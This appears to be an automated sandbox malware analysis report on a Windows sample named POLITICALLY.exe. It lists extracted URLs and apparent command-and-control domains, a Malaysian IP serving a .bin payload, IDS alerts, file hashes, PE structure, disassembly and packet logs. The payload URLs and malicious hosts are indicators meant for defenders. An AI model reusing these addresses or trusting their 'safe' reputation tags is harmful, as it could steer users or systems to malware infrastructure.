                  http://www.moopyo.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designers?explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                    		high
                    http://www.auroraleathers.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.auroraleathers.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.prismatiq.tech/olg8/www.soakstress.xyzexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.tuancai.net/olg8/www.auroraleathers.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.morgolf.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.tiro.comexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.prismatiq.techexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.typography.netDexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.assroyalty.club/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.tuancai.netReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.easiersell.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.onlinewomensclasses.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.policomercial.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.wiseowldigital.com/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.nortier.cloudReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.auroraleathers.com/olg8/www.artboxxstudio.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fonts.comexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                      		high
                      http://www.sandoll.co.krexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.easiersell.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.moopyo.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://111.90.149.46/bin_XNLhDlJvG218.bin3POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sakkal.comexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.auroraleathers.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://111.90.149.46/bin_XNLhDlJvG218.bin/POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://111.90.149.46/bin_XNLhDlJvG218.binwPOLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://111.90.149.46/in_XNLhDlJvG218.binPOLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.purplebean.company/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.wiseowldigital.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.morgolf.comReferer:explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.artboxxstudio.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.policomercial.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cnexplorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.policomercial.com/olg8/www.6923599.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.purplebean.companyexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.purplebean.company/olg8/www.nortier.cloudexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers8explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.moopyo.com/olg8/www.morgolf.comexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.prismatiq.tech/olg8/explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.cunerier.com/olg8/www.purplebean.companyexplorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              111.90.149.46
                              		unknownMalaysia
                              		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:411376
                              Start date:11.05.2021
                              Start time:20:41:30
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 9m 36s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:POLITICALLY.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:27
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 32.9% (good quality ratio 28.7%)
                              • Quality average: 71%
                              • Quality standard deviation: 33.3%
                              HCA Information:
                              • Successful, ratio: 57%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              111.90.149.46attached template.exeGet hashmaliciousBrowse
                              • 111.90.149.46/chris_fctvQ149.bin

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYattached template.exeGet hashmaliciousBrowse
                              • 111.90.149.46
                              0F1D9F17D6380C6318F136F9F951922CFFD80BA90FA87.exeGet hashmaliciousBrowse
                              • 101.99.84.46
                              2f50000.exeGet hashmaliciousBrowse
                              • 124.217.246.96
                              d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                              • 101.99.95.105
                              SecuriteInfo.com.ArtemisB23AF6C6F1A9.18153.exeGet hashmaliciousBrowse
                              • 101.99.91.200
                              t0lYf7AR1S.exeGet hashmaliciousBrowse
                              • 101.99.91.200
                              SecuriteInfo.com.Trojan.Siggen12.47248.30665.exeGet hashmaliciousBrowse
                              • 101.99.90.200
                              SecuriteInfo.com.Trojan.Siggen12.47248.964.exeGet hashmaliciousBrowse
                              • 101.99.90.200
                              SecuriteInfo.com.Trojan.Siggen12.47248.16606.exeGet hashmaliciousBrowse
                              • 101.99.90.200
                              SecuriteInfo.com.Trojan.Siggen12.47234.30189.exeGet hashmaliciousBrowse
                              • 101.99.90.200
                              SecuriteInfo.com.Trojan.Siggen12.47248.1366.exeGet hashmaliciousBrowse
                              • 101.99.90.200
                              co#U00cc pia de pagamento.xlsxGet hashmaliciousBrowse
                              • 111.90.146.131
                              OUOTATION.docGet hashmaliciousBrowse
                              • 101.99.91.20
                              JQQyuX3xg6.exeGet hashmaliciousBrowse
                              • 111.90.150.162
                              m2xzKhblzC.exeGet hashmaliciousBrowse
                              • 111.90.150.162
                              q1JP6yNjf3.exeGet hashmaliciousBrowse
                              • 111.90.150.37
                              seed.exeGet hashmaliciousBrowse
                              • 101.99.90.200
                              SecuriteInfo.com.BehavesLike.Win32.Virut.rc.exeGet hashmaliciousBrowse
                              • 111.90.146.182
                              PO-3170012466.exeGet hashmaliciousBrowse
                              • 101.99.90.137
                              0238-35-pdf.scr.exeGet hashmaliciousBrowse
                              • 101.99.70.172

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):4.19678454383093
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.15%
                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:POLITICALLY.exe
                              File size:225280
                              MD5:80b3365808440838596864bd6d492c02
                              SHA1:ea14e621d263a3754234a65bc76cff61bf9eceab
                              SHA256:8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
                              SHA512:099d2a0694b12a503b8af3e192dc620b5902a76ceb0d353e7fdd1d8324e9309a32c5982360c1f83cd5c0f8e8671556764cb832e43d25d2fa6c1a5d9bef188dbc
                              SSDEEP:768:OAXQMQNI4JuxzJ4j7gazx8RazCmE9ejxvZZHlPbUlmFZ2/5Pj3KZhmOwk/Z2ZOqk:HQE67XsaGeBnVYlmO/tKZcnOYaUHfwH
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................................Rich............................PE..L...z9.V.................@...0......l........P....@

                              File Icon

                              Icon Hash:20047c7c70f0e004

                              Static PE Info

                              General

                              Entrypoint:0x40186c
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x5617397A [Fri Oct 9 03:50:18 2015 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:263c7af0bbeabd79b6d008518dc45217

                              Entrypoint Preview

                              Instruction
                              push 00401D18h
                              call 00007FDAB4B190F5h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              inc eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx-003A59BAh], bh
                              dec esi
                              mov ch, 4Ah
                              scasd
                              or ax, 0000F3CFh
                              fyl2xp1
                              adc eax, 00000000h
                              add byte ptr [eax], al
                              add dword ptr [eax], eax
                              add byte ptr [eax], al
                              inc edx
                              add byte ptr [esi], al
                              push eax
                              add dword ptr [edx], 70h
                              jc 00007FDAB4B19171h
                              jo 00007FDAB4B19163h
                              imul ebp, dword ptr [bp+65h], B4000073h
                              dec ebp
                              jno 00007FDAB4B19104h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              dec esp
                              xor dword ptr [eax], eax
                              or byte ptr [edi], cl
                              jnbe 00007FDAB4B1912Eh
                              adc byte ptr [esi-5EBA1FE9h], FFFFFFD0h
                              mov cl, AEh
                              xchg eax, edi
                              or eax, ecx
                              add ah, byte ptr [eax-74h]
                              mov edx, A94DAC2Ch
                              mov eax, 5CDE5CBFh
                              xor eax, AD4F3A6Dh
                              xor ebx, dword ptr [ecx-48EE309Ah]
                              or al, 00h
                              stosb
                              add byte ptr [eax-2Dh], ah
                              xchg eax, ebx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              retf 0001h
                              add byte ptr [edi+00h], bl
                              add byte ptr [eax], al
                              add byte ptr [ebx], dl
                              add byte ptr [edx+61h], al
                              popad
                              popad
                              jc 00007FDAB4B19166h
                              jnc 00007FDAB4B1916Eh
                              push 0000006Ch
                              imul esp, dword ptr [edi+68h], 00736465h

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x33f040x28.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x9c8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1ac.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x3358c0x34000False0.186218261719data4.29411829073IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .data0x350000x16040x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x370000x9c80x1000False0.17919921875data2.17499641936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_ICON0x378980x130data
                              RT_ICON0x375b00x2e8data
                              RT_ICON0x374880x128GLS_BINARY_LSB_FIRST
                              RT_GROUP_ICON0x374580x30data
                              RT_VERSION0x371500x308dataEnglishUnited States

                              Imports

                              DLLImport
                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaR4Var, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaVarMul, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, __vbaDateVar, __vbaI2Var, _CIlog, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarDup, __vbaStrComp, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                              Version Infos

                              DescriptionData
                              Translation0x0409 0x04b0
                              LegalCopyrightGitrama Digt
                              InternalNamePOLITICALLY
                              FileVersion7.04.0005
                              CompanyNameGitrama Digt
                              LegalTrademarksGitrama Digt
                              ProductNameGitrama Digt
                              ProductVersion7.04.0005
                              FileDescriptionGitrama Digt
                              OriginalFilenamePOLITICALLY.exe

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              05/11/21-20:43:41.179404TCP2018752ET TROJAN Generic .bin download from Dotted Quad4974480192.168.2.6111.90.149.46
                              05/11/21-20:44:37.748915TCP1201ATTACK-RESPONSES 403 Forbidden804975999.83.154.118192.168.2.6

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 11, 2021 20:43:40.959551096 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.175250053 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.178649902 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.179404020 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.396996021 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397047997 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397064924 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397084951 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397090912 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.397100925 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397118092 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397131920 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.397135019 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397154093 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397172928 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397190094 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.397192001 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.397257090 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.397270918 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614077091 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614115953 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614140987 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614190102 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614252090 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614274025 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614296913 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614327908 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614356995 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614526033 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614707947 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614732027 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614757061 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614787102 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614794016 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614850998 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614852905 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614902020 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.614923000 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614945889 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614974022 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.614990950 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.615401983 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.615430117 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.615436077 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.615454912 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.615482092 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.615497112 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.615593910 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.615621090 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.615879059 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.615952969 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.830636024 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830676079 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830698967 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830722094 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830744028 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830760002 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.830769062 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830792904 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.830817938 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.830838919 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.830923080 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.830974102 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831089973 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831106901 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.831113100 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831135988 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831160069 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831182003 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831203938 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831224918 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.831226110 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831229925 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.831250906 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831274033 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831298113 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831319094 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831338882 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.831372976 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.831377983 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.831422091 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.831428051 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832262993 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832326889 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832345963 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832350969 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832371950 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832393885 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832415104 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832443953 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832489014 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832659960 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832776070 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832782030 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832799911 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832823992 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.832889080 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832942009 CEST4974480192.168.2.6111.90.149.46
                              May 11, 2021 20:43:41.832959890 CEST8049744111.90.149.46192.168.2.6
                              May 11, 2021 20:43:41.833071947 CEST8049744111.90.149.46192.168.2.6

                              HTTP Request Dependency Graph

                              • 111.90.149.46

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.649744111.90.149.4680C:\Users\user\Desktop\POLITICALLY.exe
                              TimestampkBytes transferredDirectionData
